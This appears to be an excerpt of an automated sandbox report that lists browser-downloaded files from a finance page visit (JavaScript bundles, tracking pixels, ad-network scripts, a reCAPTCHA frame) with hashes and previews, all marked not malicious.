                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as Ee,c as He,A as q,e as G,b as K,d as W,f as P,j as O,i as I,B as Se,U as S,k as R,l as B,u as Re,g as Ue,a as Be,Y as J,T as De,q as N,_ as D,G as Ce,v as Xe,I as Ze,P as Ne,t as we,p as ke,h as xe,m as pe,C as ze}from"./scheduler.Dr9AAxFe.js";import{S as Ge,i as We,t as _,g as qe,a as M,e as Te,c as ee,b as te,m as le,d as ie}from"./index.DCSmZEjO.js";import{g as Pe,a as Ie}from"./spread.CgU5AtxT.js";import{C as $e}from"./check.21reEWCG.js";import{I as Ke}from"./Icon.BSWt_jx8.js";import{A as et}from"./a11y-dialog.esm.BnYZCIGX.js";import{B as tt}from"./Button.DpT5MMuf.js";import{C as _e}from"./expand_more.DscV4c36.js";import{b as Le}from"./i13nUtil.C-uBpR7k.js";import{U as lt}from"./commonUtil.CI22_Irn.js";import{a as it}from"./43.CtYdpA_T.js";function Ve(i){let e,l;return e=new Ke({props:{icon:$e,className:"check",size:i[6],type:"action"}}),{c(){ee(e.$$.fragment)},l(a){te(e.$$.fragment,a)},m(a,u){le(e,a,u),l=!0},p(a,u){const c={};u&64&&(c.size=a[6]),e.$set(c)},i(a){l||(_(e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (19456)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):19457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.519210311227582
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:UxMbaWNbiiuUZTbrZrqeZaUefJyUq1Zh/dulmpgJIXwUXhYYT2YYC:wMbaWNbfZT/ZdZaU8wx/JNxn2Y5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CA667DA7F83CFA2F1C30ABD30F91F285
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B02E46FAF7DA1FDE7304AB953EF4334DC63DE527
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B25840652DC4579A9C9ECE9EA7224705279CA98886FA099CAE0A9B804A9DFBE6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:855E2CB81ACEBFF82AE70FAC99CBE599C5DF2D8E30C24769C737EF127A0CE6B3C99D764F30CEF800E5F6B422BDF9B8BFA2A0F6C0A07383814BDDA697B88814BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as c1,e as U,b as N,d as z,f as L,j as B,i as C,q as h,U as S,k as b,l as H,x as b1,N as I,t as A,p as X,h as F,m as w1,n as E,_ as t1,C as M1,J as x,K as e1}from"./scheduler.Dr9AAxFe.js";import{S as u1,i as _1,g as J,a as y,e as W,t as V,c as O,b as R,m as Y,d as q}from"./index.DCSmZEjO.js";import{g as $1}from"./globals.D0QH3NT1.js";import{e as i1}from"./each.BExQfwb4.js";import{g as n1,n as y1,t as P,X as H1}from"./commonUtil.CI22_Irn.js";import{L as K}from"./Link.Cll6KZpb.js";const{Boolean:L1}=$1;function s1(n,e,l){const t=n.slice();return t[33]=e[l].label,t[34]=e[l].url,t}function D1(n){let e,l,t,i,s,a,c;return l=new K({props:{i13nModel:n[13],href:n[11],size:n[3],variant:"subtle",noUnderline:!0,$$slots:{default:[U1]},$$scope:{ctx:n}}}),s=new K({props:{i13nModel:n[13],href:n[12],size:n[3],className:n[0]?"center-dot":"",variant:"subtle",noUnderline:!0,$$slots:{default:[z1]},$$scope:{ctx:n}}}),{c(){e=U("div"),t=U("div"),O(l.$$.fragment),i=N(),a=U("div"),O(s.$$.fragment),this.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537148856&val=ZwWElQAHy2g0HAA9&_test=ZwWElQAHy2g0HAA9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=70652642&p=133799&s=0&a=0&ptask=ALL&np=0&fp=0&rp=1&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):829
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.396224017015826
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:4HksvMq5/Jz2pRNrBZJuvu8goqc0ioNhc+14+mI:2Pz2bNrVENtmN+p+j
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EC1A75C95B4EA0D7E72810E1E2EBCDFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D2B7017CA88A64F36D5A07C59AD12ACB783E6923
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A8D356F4395713130BE21677724ECC753889C2D26DCA9EFF11309487B4B33001
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8F645946FC3E27C67E5C4C5416A726A1F80DD6A55191C272AABEC49E279C478B6DECD93F5C1EFB61DE6B308B343F3737BD78671ADB5F154FD9177DD6F134BB35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://www.google.com/recaptcha/api2/aframe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE HTML><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body><script nonce="LG_hYd5bn8kdNkAm9Du-oA">/** Anti-fraud and anti-abuse applications only. See google.com/recaptcha */ try{var clients={'sodar':'https://pagead2.googlesyndication.com/pagead/sodar?'};window.addEventListener("message",function(a){try{if(a.source===window.parent){var b=JSON.parse(a.data);var c=clients[b['id']];if(c){var d=document.createElement('img');d.src=c+b['params']+'&rc='+(localStorage.getItem("rc::a")?sessionStorage.getItem("rc::b"):"");window.document.body.appendChild(d);sessionStorage.setItem("rc::e",parseInt(sessionStorage.getItem("rc::e")||0)+1);localStorage.setItem("rc::h",'1728414906886');}}}catch(b){}});window.parent.postMessage("_grecaptcha_ready", "*");}catch(b){}</script></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):685
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.5735437116465585
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:6v/7lpSgtk18Q3s7hbC4tQw5TNdztLFzJjIif4G3QWRORS9TvAMaoREKVwobqJDq:wt88qmFC4fdtM+XERShAMaodKVpNK8c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B9913F5599FAAB08D2ADDF87011C61E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D9AE6E6A8CA0E50E02A991D032D9B9A461079F95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:68BA1605B3A54D7F827C22CC7252F01C6BF9412CFA6573BE2C91FCD4B9E908CD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7BAEA45F411FC30232BD93D04B8CF34414D333096EC669558EE6DD4A4A725785786F488B387E6C38654BA4FD3AECFDA5526DE2D949851796582C75214A42150F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/5805.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....tIDATx^.=N.@.F..ks...., D..A....$D.5.k.."..#a%.....w.Oz.....T..lm......,_.X.e}rp(...6.-...O.hpM~.>:..X...`#].....c.}...c.}..Kb...`x*r./........*.A.....r.+..-.{m9_#,.!...r.ZX.m.<.-..........1...h....vd.%...amma.........u.r.%<..+........0G......_....,m./`....aV....M...Z.2{|.d.pT...ZJ`VH.[.sB.d........6T_..f..~{...|T.KU]..`...a./G..g]U]..f5..D..H`.M.......C..9_U. .Y..<.c.Q...]..9t....J......f...E......c..Vu..... .Y.\..*Z..fi.2..r.>K..9...lrm.>,..YMr.%<......o..u..&9w...U.]21......v~..`A.....9kaa_..8u9...IU.e..R.s9....<^04.9......W...*.V...".../.Z...l.m.O'..bdc...9a.QPiTY..-.....9.cd.........3.........IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=triplelift&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&f=i&uid=1998254139224437510781
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3343)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):301355
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4931212792721515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:X2YbbFzCDhiFOqOX4JkkNPkoaeIyVX0iu/SX3k/pxDNbfCjgx0JBeJ6E:7bRYuvEiVX0ibkoE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6007B619DCCD8EB151406D60501DE932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3022B529DF7D59D71088E41604BC794D65E62567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5F068E0382D30769C6B6BB1DCDE3F0947C0414CCF90AF7938AC0B2FEC44C10B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B68283EF80A0EA3B82F2D4AC269FC1D3297E8BAC07EFA5617593EC4FFC00588AD953CC1BF64E0EAEBCA1FE5941397BCDF29CEC9454E1260DF17E8753183C028F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://fw.adsafeprotected.com/rjss/as.jivox.com/2233400/82744863/unit/unit_renderer.php?dspId=996f2104-601b-4eda-b1f2-2d6660bf451e&campaignId=177330&showAdChoices=0&jvxVer=2&isDynamic=1&siteId=662c3041de43b9&es_pId=26bd69d4&ts_pId=26bd69d4&creativeUnitType=18&bDim=728x90&bUnitId=1800&us_privacy=${US_PRIVACY}&gdpr=0&gdpr_consent=&ap_DataSignal1=21693590068&c_Auctionid=ABAjH0h0mtaKCUnp5KPPXQL99Lmv&ap_DataSignal2=AOjeLNEAAABpCmEKDAgAFQAAAAAdAAAAABIMCAAVAAAAAB0AAAAAIhQItNSn6FCoAqf17JgCsALG6b3lA0AB0gIqGAEiEwivisWvv_-IAxWUJVUIHQeDNWEoATABONWkjr6TE0ACSAFYiIEgEMyVtp4CpsnoTWvY6HoMi5c0oUI9KA&r=1728414930257199&cMacro=https://googleads.g.doubleclick.net/dbm/clk%3Fsa%3DL%26ai%3DChlWQ0oQFZ6_ZD5TL1PIPh4bWiQbZsaqPetWkjr6TE__3hsakHRABIMGCi5oBYMkGoAHl9_ztAcgBCagDAcgDmwSqBKQCT9AM0sbEMJEmbK1BCkZ8HWts4Nn10pRZcQ8PiogjNmIHL_ooeBju56hhVoxtNK23OvFASayEpva2NocLd1grtdWatv65V6TuG-tPGKasvNdLF2GZEYWg23zXMzX1cDM6uhA7eL5eMp4HmuBRpdetSZUekbfaq85UU530Gg6340il2gJYbRj3xRPevvM8J01xdC9oKfAh3Ru3txmBlUG40t5-b05bfemtpBHf0lBRJJ2YYqyStIhAjqJC70LJWlAPMsj5wqvB2rPgHgy8qHWBBbrsyOxjar1_84IiCk0ZJUFA3fgzA4pUFZWT8xBZuQ44L8RpwnlpNNmvprVa8PTIil2NYKtbxQMpgCNOJbce2qJXv6nzTPWqyyICgVoAKA-DvYETKcAEvLaNl_UE4AQDiAW01KfoUJAGAaAGTYAHg4iDkgKoB9XJG6gH2baxAqgHpr4bqAeOzhuoB5PYG6gH8OAbqAfulrECqAf-nrECqAevvrECqAeaBqgH89EbqAeW2BuoB6qbsQKoB4OtsQKoB-C9sQKoB_-esQKoB9-fsQKoB_jCsQKoB_vCsQLYBwDSCCYIgGEQARgdMgKKAjoLgECAwICAgKCIgAJIvf3BOlj6msOvv_-IA4AKA5gLAcgLAYAMAaoNAlVT4g0TCLDnw6-__4gDFZQlVQgdB4M1YeoNEwirxMSvv_-IAxWUJVUIHQeDNWGwE4WTsxnQEwDYEwrYFAHQFQH4FgGAFwGyFwIYAugXBLIYCRIC62gYTSIBAA%26ae%3D1%26num%3D1%26cid%3DCAQSOwDpaXnfaUTXaJXXKt5LmxpO2ea3XLHhsRZ6eVJQnKh_Kia1wLbdUIXINXzxbo2zEOrtGxXTy1RESuhfGAE%26sig%3DAOD64_3olhHBLR22D9rWv_3HOtPbIKInMQ%26client%3Dca-pub-2305304999188653%26dbm_c%3DAKAmf-A40ws3IRLBYvy25MoS0dUGvP9imYauOFVYts_HprW7QzMLZWvJXrImyZyAGPTB-5inh_3WXahNmuWmdq9OaTt2AQKu_SkpcIKmmgYRZe9-bpCdZxdCYmLFjNzM1mW4GzOFcLXumfHT-TprGmDUzAz8FMkHyffBmn6wEw8ZUX3MkHtGT0d-MG99KFg8Ni0bvMBIMZewVSYZnnanTHldWZG1qzFBMsX-k0P6suuWBrpvPzS-bGY%26cry%3D1%26dbm_d%3DAKAmf-C6adOVrTCsW0SADtVZuECiJcHPc5yLjx5I9P1xo5O1gC6Xjzz6TXtQT0b6m3E3TYvKVPkPk707-kAtGgjNdGSE26vXwva0dsnETK7yyyTzU7tlEcSdgbU3oz0nAeVzcLkc9QrwKtFOBcQDRpW5s08hOKxUPQM6-miPrdGZQSBTRukqH7X9qPSyZ8T8hVnrhAUds6NboUKqBklOy8-yCULeGvNLJ-378fKKSfI2u6pCNM9eqoXQWhHUItIg4TlTAJO18ZCU6IJQOXZFFgQFtLcfWpPsD11kkgwzQsaSY-R7ZoCG777wvL8bu9IYg_k2uJrNMdAGUOHwNDlbJFr4HlWj9FrvcSgcCjyJyN3OVmNspuBtjUuRpCNMoT4XIqwkz8CBJ85BwPm3Z12xHi7vjAaoXoMVN1hwkbg_AK2cxvfU0fRo9QdiUhlen0tDIi-D2w13obgIzAPDVTZd63K_U9CiQhhwzkITNIgIuI2_mfmkLhX0BV2ovt2UZpGOX6D62eoVrXYpKIBU1bBg2yLPNL9cUUgKqXOpwS9KHhzg8fo-Aeh_s455ERUtnu65nBR3G5v3wvNgGpiEXB8yeHr7NBRKyVa2s2vZP44kWVmZn9oWABqOlKTO2r1cY8RVPOFjTXicJDATniIGqDJ20nmj_wN7FI-ZPUUiFv0-8i4oIkOD7Olou_0zusYW7Ex0lOev6h1gLD3l%26adurl%3D&c_dv360_source_url=https://finance.yahoo.com/markets/crypto/all/&bundleId=&ias_dspID=3&ias_campId=1018131654&ias_pubId=pub-2305304999188653&ias_chanId=1&ias_placementId=21693590068&bidurl=https://finance.yahoo.com/markets/crypto/all/&ias_dealId=549644393848240971&ias_xappb=&adsafe_par&ias_impId=v4~~ABAjH0h0mtaKCUnp5KPPXQL99Lmv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.....var __IntegralASDiagnosticCall = (function() {..try {...var alreadySent = {};...return function(code, err, config) {....try {.....if (!__IASScope.isDomless) {......try {.......__IASScope.postMessage(........{.........code,.........name: 'jsdiag',.........origin: 'ias',........},........'*'.......);......} catch (_) {}.....}......var gen = function(code, err, config) {......var url = '//diag.adsafeprotected.com/js?';......try {.......var errMsg = err && err.message ? encodeURIComponent(err.message.replace(/ /g, '-')).substring(0, 200) : '';.......url += 'code:fwjs-diag-' + code;.......url += '&err:' + errMsg;.......url += '&codeanderr:' + code + '_' + errMsg;.......if (config) {................url += '&version:' + config.version || '';........url += '&server:' + config.mn || '';........url += '&region:' + config.region || '';........url += '&mode:' + config.mode || '';........url += '&forceAppend:' + config.forceAppend || '';........url += '&asid:' + config.asid || '';........url +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
